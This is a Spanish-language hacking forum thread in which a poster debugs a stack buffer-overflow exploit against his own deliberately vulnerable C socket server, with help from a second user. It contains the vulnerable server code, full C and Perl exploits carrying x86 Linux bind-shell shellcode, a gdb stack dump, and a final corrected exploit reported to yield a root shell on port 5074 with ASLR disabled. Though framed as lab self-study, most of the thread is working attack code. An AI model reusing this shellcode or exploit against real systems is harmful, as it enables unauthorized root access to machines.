Bueno, puede que el título no sea muy elegante, pero es lo que se me ha ocurrido. Os explico:
Tengo una aplicación (Code 1) que estoy explotando. Ahora, he conseguido explotarla desde un comando en la consola. Y os escribo esto a causa del exploit que estoy haciendo y que no funciona ni grabándolo en un CD y oyéndolo al revés...
La cosa es que la shellcode se me "duplica" modificando el ret...
Os dejo algunos códigos, a ver si me podéis echar una manita...
__________________________________________________________________________________________
Exploit in action [Capt 0.1]
juanra@Juanra:~/Escritorio/Serv$ ./exploit 127.0.0.1 31337
Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net
Creating socket... [OK]
Conecting target... [OK]
Creating buffer... [OK]
Sending buffer... [OK]
Now you can exec NC [nc -vv localhost 5074]
Be good!
juanra@Juanra:~/Escritorio/Serv$
__________________________________________________________________________________________
Serv in action [Capt 0.2]
juanra@Juanra:~/Escritorio/Serv$ sudo gdb -q serv
[sudo] password for juanra:
(gdb) r 31337
Starting program: /home/juanra/Escritorio/Serv/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 03/03/2011 20:59:09
03/03/2011 20:59:09 Starting up...
03/03/2011 20:59:11 Got connection from 127.0.0.1:60359
03/03/2011 20:59:11 RECV 427 bytes: ������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�P@��P@P���f̀1�Rfh��CfS��j�QP���f̀@�D$�CC�f̀��
RRC�f̀��Ѱ?̀A���u�Rhn/shh//bi��RS���
__________________________________________________________________________________________
Serv.c [Code 1]
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <time.h>
int sockfd, newsock;
void shutup (int signal)
{
times ();
printf ("Shutting down...\n\n");
close (newsock);
close (sockfd);
exit (0);
}
int times ()
{
time_t now=time (0);
struct tm *ahora;
char buffer [40];
ahora=localtime ((const time_t*)&now);
strftime (buffer, 40, "%d/%m/%Y %H:%M:%S" , ahora);
printf ("%s ", buffer);
return 0;
}
int handle_connect (char *buffer)
{
char buff [256];
strcpy (buff, buffer);
times ();
buff [strlen (buff)-1]='\0';
printf ("RECV %d bytes: %s\n", strlen (buff), buff);
}
int main (int argc, char *argv [])
{
time_t now=time (0);
struct tm *ahora;
char hora [40];
ahora=localtime ((const time_t*)&now);
strftime (hora, 40, "%d/%m/%Y %H:%M:%S" , ahora);
printf ("SmallServ 2.0 - By Sagrini - Sagrini 2010 - %s\n", hora);
if (getuid()!=0)
{
printf ("This proccess must be run by root.\n\n");
return 1;
}
if (argc<2)
{
printf ("Use: %s <PORT>\n\n", argv [0]);
return 1;
}
int cont;
struct sockaddr_in client, host;
char buffer [1024];
int size=sizeof (client);
sockfd=socket (2, 1 , 0);
host.sin_family=AF_INET;
host.sin_port=htons (atoi (argv [1]));
host.sin_addr.s_addr=0;
bind (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr));
listen (sockfd, 3);
times ();
printf ("Starting up...\n\n");
signal (SIGTERM, shutup);
signal (SIGINT, shutup);
while (1)
{
newsock=accept (sockfd, (struct sockaddr*)&client, &size);
times ();
printf ("Got connection from %s:%d\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));
cont=recv (newsock, &buffer, 1024, 0);
while (cont>1)
{
handle_connect (buffer);
cont=recv (newsock, &buffer, 1024, 0);
}
times ();
printf ("Finishing connection from %s:%d\n\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));
close (newsock);
}
close (sockfd);
return 0;
}
__________________________________________________________________________________________
Exploit.c [Code 2]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>
int main (int argc, char *argv [])
{
printf ("Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net\n");
if (argc != 3)
{
printf ("!!! Use: %s <target_ip> <port>\n\n", argv [0]);
return 1;
}
printf ("Creating socket...\t");
struct sockaddr_in host; int sockfd;
host.sin_family = AF_INET;
host.sin_port = htons (atoi (argv [2]));
host.sin_addr.s_addr = inet_addr (argv [1]);
memset (host.sin_zero, 0, 8);
if ((sockfd=socket (2, 1, 0))==-1)
{
printf ("[FAIL]\n\n");
return 1;
}
else printf ("[OK]\n");
printf ("Conecting target...\t");
if ((connect (sockfd, (struct sockaddr*)&host, sizeof (host)))==-1)
{
printf ("[FAIL]\n\n");
return 1;
}
else printf ("[OK]\n");
printf ("Creating buffer...\t");
char nops [168];
memset (nops, '\x90', 168);
puts (nops);
char shellcode [93] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52"
"\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
"\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43"
"\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b"
"\xcd\x80";
char ret [6] = "AAAA\x90";
char command [265];
strcpy (command, nops);
strcat (command, shellcode);
strcat (command, ret);
printf ("[OK]\n");
printf ("Sending buffer...\t");
if (send (sockfd, &command, strlen (command), 0)==-1)
{
printf ("[FAIL]\n\n");
return 1;
}
else printf ("[OK]\n\n");
printf ("Now you can exec NC [nc -vv localhost 5074]\nBe good!\n\n");
return 0;
}
__________________________________________________________________________________________
Exploit Perl [Capt 1]
juanra@Juanra:~/Escritorio/Serv$ perl -e 'print "\x90"x168 . "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x50\f8\xff\xbf" . "\x90"' | nc -vv localhost 31337
+++++++++++++++++++++++++++++++++++++++++++
juanra@Juanra:~/Escritorio/Serv$ nc -vv localhost 5074 [Conectarme como root :P]
__________________________________________________________________________________________
GDB look at ESP [Capt 2]Citar
(gdb) x/5000x $esp
0xbffff800: 0x4050c389 0xb0e18950 0x3180cd66 0x686652d2
0xbffff810: 0x6643d213 0x6ae18953 0x89505110 0xcd66b0e1
0xbffff820: 0x44894080 0x43430424 0x80cd66b0 0x520cc483
0xbffff830: 0x66b04352 0x899380cd 0xcd3fb0d1 0xf9804180
0xbffff840: 0x52f67503 0x732f6e68 0x2f2f6868 0xe3896962
0xbffff850: 0xe1895352 0x80cd0bb0 0x41414141 0xb7ff6e90
0xbffff860: 0xb7fed1f8 0xb7fff2a0 0xbffffa0c 0xb7ff1413
0xbffff870: 0xb7e80428 0xb7fe25a2 0xb7ff7990 0xb7ff79b0
0xbffff880: 0xb7ffb028 0xb7ffbb31 0xb7ffbb31 0xb7ff7990
0xbffff890: 0xb7ff79b0 0xb7ffb028 0xb7ffbb31 0xb7fff2a0
0xbffff8a0: 0x00ffeff4 0x90909000 0x90909090 0x90909090
0xbffff8b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8d0: 0x90909090 0x4050c031 0x4050c389 0xb0e18950
0xbffff8e0: 0x3180cd66 0x686652d2 0x6643d213 0x6ae18953
0xbffff8f0: 0x89505110 0xcd66b0e1 0x44894080 0x43430424
0xbffff900: 0x80cd66b0 0x520cc483 0x66b04352 0x899380cd
0xbffff910: 0xcd3fb0d1 0xf9804180 0x52f67503 0x732f6e68
0xbffff920: 0x2f2f6868 0xe3896962 0xe1895352 0x80cd0bb0
0xbffff930: 0x4050c031 0x4050c389 0xb0e18950 0x3180cd66
0xbffff940: 0x686652d2 0x6643d213 0x6ae18953 0x89505110
0xbffff950: 0xcd66b0e1 0x44894080 0x43430424 0x80cd66b0
0xbffff960: 0x520cc483 0x66b04352 0x899380cd 0xcd3fb0d1
---Type <return> to continue, or q <return> to quit---
0xbffff970: 0xf9804180 0x52f67503 0x732f6e68 0x2f2f6868
0xbffff980: 0xe3896962 0xe1895352 0x80cd0bb0 0x41414141
0xbffff990: 0xb7ff6e90 0xb7fed1f8 0xb7fff2a0 0xbffffa0c
0xbffff9a0: 0xb7ff1413 0xb7e80428 0xb7fe25a2 0xb7ff7990
0xbffff9b0: 0xb7ff79b0 0xb7ffb028 0xb7ffbb31 0xb7ffbb31
0xbffff9c0: 0xb7ff7990 0xb7ff79b0 0xb7ffb028 0xb7ffbb31
0xbffff9d0: 0xb7fff2a0 0xb7ffeff4 0xb7fe2000 0x00000007
0xbffff9e0: 0xb7fe2450 0x00000000 0x00000008 0x00000070
0xbffff9f0: 0xb7edf620 0x00000001 0xb7fe0d60 0x0804a054
0xbffffa00: 0xb7ffeff4 0x0000000c 0x00000007 0xbffffa94
0xbffffa10: 0xb7ff19ae 0x00000007 0x00000010 0x00000001
0xbffffa20: 0xb7fe25ce 0x00000000 0xb7fe2778 0xb7fe22f0
0xbffffa30: 0xb7fe0d40 0xb7fff014 0x00000002 0xb7fff2a0
0xbffffa40: 0xb7ff6e01 0x00000000 0xb7fe2290 0xb7fe2450
0xbffffa50: 0x00000000 0xb7ffef98 0x00000006 0xb7fe25ce
0xbffffa60: 0xb7fe2290 0x00000000 0x00000000 0xb7ff6f35
0xbffffa70: 0x00000008 0x00000088 0xb7ffeff4 0xbffffa94
0xbffffa80: 0xb7ff701e 0x00000088 0xbffffacc 0xbffffae8
0xbffffa90: 0x00000000 0xbffffabc 0xb7ff3209 0x00000011
0xbffffaa0: 0x00000008 0xb7e6d6c0 0x00000038 0x00000001
0xbffffab0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffac0: 0x00000000 0x00000208 0xb7fe26d0 0x000000a8
0xbffffad0: 0x00000000 0x00000000 0x00000000 0xb7fe0dcc
---Type <return> to continue, or q <return> to quit---
0xbffffae0: 0xb7fea3b2 0xb7fd1000 0x0000df31 0xb7ffeff4
0xbffffaf0: 0xbffffcb0 0xb7fe536d 0xb7e7a400 0x0d696910
0xbffffb00: 0xbffffb38 0xb7feabe8 0xb7e8041e 0x0804848d
0xbffffb10: 0x00000000 0xb7fff948 0xb7fe0b40 0xbfff0002
0xbffffb20: 0xb7ff0ca8 0x080483dc 0xb7fff954 0xb7ffeff4
0xbffffb30: 0xb7fe0b14 0x00000001 0xbffffbb4 0xb7feafdd
0xbffffb40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb50: 0x00000000 0xb7ffae88 0xbffffb80 0x00000000
0xbffffb60: 0xf63d4e2e 0xb7fe0858 0x07b1ea71 0x00000003
0xbffffb70: 0xb7e71d10 0xb7e71b08 0x00000000 0x00000000
0xbffffb80: 0x00000000 0x00000000 0x00000001 0x0000086f
0xbffffb90: 0xb7fe0b40 0xb7fe0858 0x08048475 0xb7e7ac20
0xbffffba0: 0x080482ac 0x00000001 0xb7ffeff4 0xf63d4e2e
0xbffffbb0: 0xb7fff828 0xbffffca0 0xb7feb1ef 0xbffffc90
0xbffffbc0: 0x080482ac 0xbffffc84 0xb7fff7cc 0x00000000
0xbffffbd0: 0xb7fe0b40 0x00000001 0x00000000 0x00000001
0xbffffbe0: 0xb7fff658 0x00000000 0x00010000 0x00000000
0xbffffbf0: 0xb7fe1168 0x00000000 0xbffffc90 0xbffffc84
0xbffffc00: 0x00000000 0x00000000 0x00000000 0xbffffcd0
0xbffffc10: 0xb7fff670 0x08048475 0x00000000 0x00000000
0xbffffc20: 0x00000000 0x00000000 0xb7fe3000 0x697a0002
0xbffffc30: 0x00000000 0x00000000 0x00000000 0xb2b70002
0xbffffc40: 0x0100007f 0x00000000 0x00000000 0x302f3330
---Type <return> to continue, or q <return> to quit---
0xbffffc50: 0x30322f33 0x32203131 0x31333a30 0x0030333a
0xbffffc60: 0xb7f8f329 0x08049ff4 0xbffffc78 0x080485d0
0xbffffc70: 0xb7fccff4 0x4d6fec92 0xb7fd0360 0x00000165
0xbffffc80: 0xbffffca0 0xb7fccff4 0xbffffcf8 0xb7e84775
0xbffffc90: 0x08048bd0 0x08048750 0xbffffcf8 0xb7e84775
0xbffffca0: 0x00000002 0xbffffd24 0xbffffd30 0xb7fe0b40
0xbffffcb0: 0x00000001 0x00000001 0x00000000 0x08048475
0xbffffcc0: 0xb7fccff4 0x08048bd0 0x08048750 0xbffffcf8
0xbffffcd0: 0xb5bf4009 0x9ac87419 0x00000000 0x00000000
0xbffffce0: 0x00000000 0xb7ff57f0 0xb7e8469d 0xb7ffeff4
0xbffffcf0: 0x00000002 0x08048750 0x00000000 0x08048771
0xbffffd00: 0x08048908 0x00000002 0xbffffd24 0x08048bd0
0xbffffd10: 0x08048bc0 0xb7ff07b0 0xbffffd1c 0xb7ffbd83
0xbffffd20: 0x00000002 0xbffffe28 0xbffffe4a 0x00000000
0xbffffd30: 0xbffffe50 0xbffffe60 0xbffffe6b 0xbffffe75
0xbffffd40: 0xbffffe86 0xbffffe94 0xbffffea2 0xbffffead
0xbffffd50: 0xbffffefe 0xbfffff1f 0xbfffff30 0xbfffff39
0xbffffd60: 0xbfffff41 0xbfffff63 0xbfffff75 0xbfffff82
0xbffffd70: 0xbfffff90 0xbfffff9d 0xbfffffb6 0x00000000
0xbffffd80: 0x00000020 0xb7fe1420 0x00000021 0xb7fe1000
0xbffffd90: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xbffffda0: 0x00000011 0x00000064 0x00000003 0x08048034
0xbffffdb0: 0x00000004 0x00000020 0x00000005 0x00000008
---Type <return> to continue, or q <return> to quit---
0xbffffdc0: 0x00000007 0xb7fe2000 0x00000008 0x00000000
0xbffffdd0: 0x00000009 0x08048750 0x0000000b 0x00000000
0xbffffde0: 0x0000000c 0x00000000 0x0000000d 0x00000000
0xbffffdf0: 0x0000000e 0x00000000 0x00000017 0x00000000
0xbffffe00: 0x0000001f 0xbfffffda 0x0000000f 0xbffffe1b
0xbffffe10: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffffe20: 0x00000000 0x00000000 0x6d6f682f 0x756a2f65
0xbffffe30: 0x61726e61 0x6373452f 0x6f746972 0x2f6f6972
0xbffffe40: 0x76726553 0x7265732f 0x31330076 0x00373333
0xbffffe50: 0x4c454853 0x622f3d4c 0x622f6e69 0x00687361
0xbffffe60: 0x4d524554 0x6574783d 0x55006d72 0x3d524553
0xbffffe70: 0x746f6f72 0x44555300 0x53555f4f 0x6a3d5245
0xbffffe80: 0x726e6175 0x55530061 0x555f4f44 0x313d4449
0xbffffe90: 0x00303030 0x52455355 0x454d414e 0x6f6f723d
0xbffffea0: 0x4f430074 0x4e4d554c 0x30383d53 0x54415000
0xbffffeb0: 0x752f3d48 0x6c2f7273 0x6c61636f 0x6962732f
0xbffffec0: 0x752f3a6e 0x6c2f7273 0x6c61636f 0x6e69622f
0xbffffed0: 0x73752f3a 0x62732f72 0x2f3a6e69 0x2f727375
0xbffffee0: 0x3a6e6962 0x6962732f 0x622f3a6e 0x2f3a6e69
0xbffffef0: 0x2f727375 0x52313158 0x69622f36 0x5750006e
0xbfffff00: 0x682f3d44 0x2f656d6f 0x6e61756a 0x452f6172
0xbfffff10: 0x69726373 0x69726f74 0x65532f6f 0x4c007672
0xbfffff20: 0x3d474e41 0x455f7365 0x54552e53 0x00382d46
---Type <return> to continue, or q <return> to quit---
0xbfffff30: 0x454e494c 0x34323d53 0x4c485300 0x303d4c56
0xbfffff40: 0x44555300 0x4f435f4f 0x4e414d4d 0x752f3d44
0xbfffff50: 0x622f7273 0x672f6e69 0x2d206264 0x65732071
0xbfffff60: 0x48007672 0x3d454d4f 0x6d6f682f 0x756a2f65
0xbfffff70: 0x61726e61 0x474f4c00 0x454d414e 0x6f6f723d
0xbfffff80: 0x55530074 0x475f4f44 0x313d4449 0x00303030
0xbfffff90: 0x50534944 0x3d59414c 0x302e303a 0x4c4f4300
0xbfffffa0: 0x4554524f 0x673d4d52 0x656d6f6e 0x7265742d
0xbfffffb0: 0x616e696d 0x4158006c 0x4f485455 0x59544952
0xbfffffc0: 0x6f682f3d 0x6a2f656d 0x726e6175 0x582e2f61
0xbfffffd0: 0x68747561 0x7469726f 0x682f0079 0x2f656d6f
0xbfffffe0: 0x6e61756a 0x452f6172 0x69726373 0x69726f74
0xbffffff0: 0x65532f6f 0x732f7672 0x00767265 0x00000000
Un saludo a todos y muchas gracias...
Hola Sagrini,
La debes tener dos veces porq primero la recibis en buffer y despues llamas a handle_connect que la copia a buff.
Otro detalle, tene cuidado cuando armas el payload
char nops [168];
memset (nops, '\x90', 168);
puts (nops);
char shellcode [93] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52"
"\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
"\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43"
"\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b"
"\xcd\x80";
char ret [6] = "AAAA\x90";
char command [265];
strcpy (command, nops);
strcat (command, shellcode);
strcat (command, ret);
Si usas memset, el caracter nulo que marca el final del string no te lo agrega.
char nops [168];
memset (nops, '\x90', 168);
Y despues strcpy o strcat hacen cualquier cosa. Cuando inicializas los char [] no hay problema, el compilador te los agrega automaticamente.
Aca te lo pase en limpio (en c++) espero que te sirva
#include <iostream>
using namespace std;
int main (int argc, char *argv [])
{
string nops(168, '\x90');
string shellcode("\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52"
"\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
"\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43"
"\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b"
"\xcd\x80");
string ret("AAAA\x90");
string command(nops + shellcode + ret);
cout << command;
return 0;
}
Lo podes verificar con hexdump si queres
$./a.out | hexdump -v
Saludos
Sí, pero la cosa es que el retorno se me sitúa al principio de una de ellas... Ahh! Siempre se me olvida, el RET retrocede cuatro bytes, a lo mejor es por eso :P Luego miro a ver...
Gracias, la vida está llena de despistes... En este mismo caso tuve un problema que me llevó su tiempo: En el retorno no habí puesto bien todo...
Tanan!!! Fin!!!
La cosa era que la shellcode se copiaba dos veces porque, como bien dice Iván (no lo interpreté bien...), la shellcode se copia dos veces porque memset no le pone un \x00 al final...
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>
int main (int argc, char *argv [])
{
printf ("Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net\n");
if (argc != 3)
{
printf ("!!! Use: %s <target_ip> <port>\n\n", argv [0]);
return 1;
}
printf ("Creating socket...\t");
struct sockaddr_in host; int sockfd;
host.sin_family = AF_INET;
host.sin_port = htons (atoi (argv [2]));
host.sin_addr.s_addr = inet_addr (argv [1]);
memset (host.sin_zero, 0, 8);
if ((sockfd=socket (2, 1, 0))==-1)
{
printf ("[FAIL]\n\n");
return 1;
}
else printf ("[OK]\n");
printf ("Conecting target...\t");
if ((connect (sockfd, (struct sockaddr*)&host, sizeof (host)))==-1)
{
printf ("[FAIL]\n\n");
return 1;
}
else printf ("[OK]\n");
printf ("Creating buffer...\t");
char nops [169];
memset (nops, '\x90', 168);
nops [168] = '\x00';
char shellcode [93] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80"
"\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
"\xe1\xb0\x0b\xcd\x80";
char ret [6] = "\x50\xf8\xff\xbf\x90";
char command [265];
strcpy (command, nops);
strcat (command, shellcode);
strcat (command, ret);
printf ("[OK]\n");
printf ("Sending buffer...\t");
if (send (sockfd, &command, strlen (command), 0)==-1)
{
printf ("[FAIL]\n\n");
return 1;
}
else printf ("[OK]\n\n");
printf ("Now you can exec NC [nc -vv %s 5074]\nBe good!\n\n", argv [1]);
return 0;
}
Un saludo!!!
____________________
Modf: Lo acabo de probar en otro sistema, y sólo con desactivar el randomize_va_space y cambiar el RET, todo va perfectamente y me abre una shell con privilegios root en el puerto 5074. Conseguido! Ahora voy a ver por qué no funciona fuera del GDB...